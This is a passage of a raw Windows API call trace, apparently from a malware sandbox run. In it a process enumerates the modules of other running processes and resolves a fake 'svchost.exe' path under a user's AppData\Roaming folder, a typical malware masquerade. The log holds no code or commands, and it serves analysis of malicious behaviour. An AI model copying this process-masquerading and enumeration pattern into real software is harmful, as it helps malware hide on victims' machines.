hModule=0xad0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Program Files\\Java\\control notice.exe" (normalized: "c:\\program files\\java\\control notice.exe")) returned 0x28 [0064.006] CoTaskMemFree (pv=0xd91760) [0064.006] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x247dfe8, cb=0x18 | out: lpmodinfo=0x247dfe8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.007] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.007] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.007] CoTaskMemFree (pv=0xd91760) [0064.007] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.007] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.008] CoTaskMemFree (pv=0xd91760) [0064.008] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24801a8, cb=0x18 | out: lpmodinfo=0x24801a8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.008] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.008] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.009] CoTaskMemFree (pv=0xd91760) [0064.009] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.009] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.011] CoTaskMemFree (pv=0xd91760) [0064.011] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2482368, cb=0x18 | out: lpmodinfo=0x2482368*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.011] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.011] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.012] CoTaskMemFree (pv=0xd91760) [0064.012] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.012] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.013] CoTaskMemFree (pv=0xd91760) [0064.013] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2484538, cb=0x18 | out: lpmodinfo=0x2484538*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.013] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.013] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.014] CoTaskMemFree (pv=0xd91760) [0064.014] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.014] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.015] CoTaskMemFree (pv=0xd91760) [0064.015] CloseHandle (hObject=0x214) returned 1 [0064.016] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.017] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x214 [0064.017] EnumProcessModules (in: hProcess=0x214, lphModule=0x2486c58, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2486c58, lpcbNeeded=0x23ee40) returned 1 [0064.019] GetModuleInformation (in: hProcess=0x214, hModule=0xff0c0000, lpmodinfo=0x2486ec8, cb=0x18 | out: lpmodinfo=0x2486ec8*(lpBaseOfDll=0xff0c0000, SizeOfImage=0x23000, EntryPoint=0xff0c6290)) returned 1 [0064.019] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.019] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff0c0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wininit.exe") returned 0xb [0064.020] CoTaskMemFree (pv=0xd91760) [0064.020] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.020] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff0c0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wininit.exe" (normalized: "c:\\windows\\system32\\wininit.exe")) returned 0x1f [0064.020] CoTaskMemFree (pv=0xd91760) [0064.020] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24890c0, cb=0x18 | out: lpmodinfo=0x24890c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.021] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.021] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.021] CoTaskMemFree (pv=0xd91760) [0064.021] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.021] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.022] CoTaskMemFree (pv=0xd91760) [0064.022] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x248b280, cb=0x18 | out: lpmodinfo=0x248b280*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0064.022] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.023] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0064.023] CoTaskMemFree (pv=0xd91760) [0064.023] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.023] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0064.024] CoTaskMemFree (pv=0xd91760) [0064.024] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x248d450, cb=0x18 | out: lpmodinfo=0x248d450*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0064.024] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.024] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0064.048] CoTaskMemFree (pv=0xd91760) [0064.048] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.048] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0064.049] CoTaskMemFree (pv=0xd91760) [0064.049] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x248f620, cb=0x18 | out: lpmodinfo=0x248f620*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0064.049] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.049] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0064.050] CoTaskMemFree (pv=0xd91760) [0064.050] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.050] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0064.051] CoTaskMemFree (pv=0xd91760) [0064.051] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2491838, cb=0x18 | out: lpmodinfo=0x2491838*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0064.052] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.052] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0064.053] CoTaskMemFree (pv=0xd91760) [0064.053] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.053] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0064.054] CoTaskMemFree (pv=0xd91760) [0064.054] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24939f8, cb=0x18 | out: lpmodinfo=0x24939f8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0064.055] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.055] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0064.056] CoTaskMemFree (pv=0xd91760) [0064.056] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.056] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0064.057] CoTaskMemFree (pv=0xd91760) [0064.057] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2495ba8, cb=0x18 | out: lpmodinfo=0x2495ba8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0064.058] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.058] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0064.059] CoTaskMemFree (pv=0xd91760) [0064.059] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.059] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0064.060] CoTaskMemFree (pv=0xd91760) [0064.060] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2497d68, cb=0x18 | out: lpmodinfo=0x2497d68*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0064.061] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.061] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0064.062] CoTaskMemFree (pv=0xd91760) [0064.062] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.062] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0064.063] CoTaskMemFree (pv=0xd91760) [0064.063] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2499fd8, cb=0x18 | out: lpmodinfo=0x2499fd8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0064.064] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.064] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0064.065] CoTaskMemFree (pv=0xd91760) [0064.065] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.065] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0064.066] CoTaskMemFree (pv=0xd91760) [0064.066] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x249c198, cb=0x18 | out: lpmodinfo=0x249c198*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0064.067] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.067] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0064.068] CoTaskMemFree (pv=0xd91760) [0064.068] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.069] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0064.070] CoTaskMemFree (pv=0xd91760) [0064.070] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x249e358, cb=0x18 | out: lpmodinfo=0x249e358*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0064.071] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.071] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0064.072] CoTaskMemFree (pv=0xd91760) [0064.072] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.072] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0064.074] CoTaskMemFree (pv=0xd91760) [0064.074] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24a0518, cb=0x18 | out: lpmodinfo=0x24a0518*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0064.075] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.075] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0064.076] CoTaskMemFree (pv=0xd91760) [0064.076] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.076] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0064.078] CoTaskMemFree (pv=0xd91760) [0064.078] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24a26d8, cb=0x18 | out: lpmodinfo=0x24a26d8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0064.079] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.079] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0064.080] CoTaskMemFree (pv=0xd91760) [0064.080] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.080] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0064.081] CoTaskMemFree (pv=0xd91760) [0064.082] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24a4898, cb=0x18 | out: lpmodinfo=0x24a4898*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0064.083] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.083] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0064.084] CoTaskMemFree (pv=0xd91760) [0064.084] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.084] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0064.086] CoTaskMemFree (pv=0xd91760) [0064.086] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24a6a68, cb=0x18 | out: lpmodinfo=0x24a6a68*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0064.087] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.087] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0064.092] CoTaskMemFree (pv=0xd91760) [0064.092] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.092] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0064.093] CoTaskMemFree (pv=0xd91760) [0064.093] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24a8c38, cb=0x18 | out: lpmodinfo=0x24a8c38*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0064.095] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.095] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0064.096] CoTaskMemFree (pv=0xd91760) [0064.096] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.096] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0064.098] CoTaskMemFree (pv=0xd91760) [0064.098] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x24aaf10, cb=0x18 | out: lpmodinfo=0x24aaf10*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0064.099] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.099] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0064.101] CoTaskMemFree (pv=0xd91760) [0064.101] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.101] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0064.103] CoTaskMemFree (pv=0xd91760) [0064.103] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x24ad0c0, cb=0x18 | out: lpmodinfo=0x24ad0c0*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0064.105] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.105] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0064.107] CoTaskMemFree (pv=0xd91760) [0064.107] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.107] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0064.108] CoTaskMemFree (pv=0xd91760) [0064.108] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x24af280, cb=0x18 | out: lpmodinfo=0x24af280*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0064.110] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.110] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0064.112] CoTaskMemFree (pv=0xd91760) [0064.112] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.112] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0064.113] CoTaskMemFree (pv=0xd91760) [0064.113] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x24b1450, cb=0x18 | out: lpmodinfo=0x24b1450*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0064.115] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.115] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0064.117] CoTaskMemFree (pv=0xd91760) [0064.117] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.117] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0064.119] CoTaskMemFree (pv=0xd91760) [0064.119] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x24b3610, cb=0x18 | out: lpmodinfo=0x24b3610*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0064.120] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.121] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0064.122] CoTaskMemFree (pv=0xd91760) [0064.122] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.122] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0064.124] CoTaskMemFree (pv=0xd91760) [0064.124] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x24b57d0, cb=0x18 | out: lpmodinfo=0x24b57d0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0064.126] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.126] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0064.128] CoTaskMemFree (pv=0xd91760) [0064.128] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.128] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0064.130] CoTaskMemFree (pv=0xd91760) [0064.130] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x24b7990, cb=0x18 | out: lpmodinfo=0x24b7990*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0064.132] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.132] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0064.134] CoTaskMemFree (pv=0xd91760) [0064.134] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.134] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0064.136] CoTaskMemFree (pv=0xd91760) [0064.136] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24b9b50, cb=0x18 | out: lpmodinfo=0x24b9b50*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0064.138] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.138] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0064.140] CoTaskMemFree (pv=0xd91760) [0064.140] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.140] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd91760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0064.142] CoTaskMemFree (pv=0xd91760) [0064.142] CloseHandle (hObject=0x214) returned 1 [0064.147] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.147] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x214 [0064.147] EnumProcessModules (in: hProcess=0x214, lphModule=0x24bc910, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24bc910, lpcbNeeded=0x23ee40) returned 1 [0064.148] GetModuleInformation (in: hProcess=0x214, hModule=0x1250000, lpmodinfo=0x24bcb80, cb=0x18 | out: lpmodinfo=0x24bcb80*(lpBaseOfDll=0x1250000, SizeOfImage=0x17000, EntryPoint=0x12514a1)) returned 1 [0064.148] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.148] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1250000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="icq.exe") returned 0x7 [0064.149] CoTaskMemFree (pv=0xd91f20) [0064.149] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.149] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1250000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\icq.exe" (normalized: "c:\\program files\\internet explorer\\icq.exe")) returned 0x2a [0064.150] CoTaskMemFree (pv=0xd91f20) [0064.150] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24bed88, cb=0x18 | out: lpmodinfo=0x24bed88*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.150] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.150] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.151] 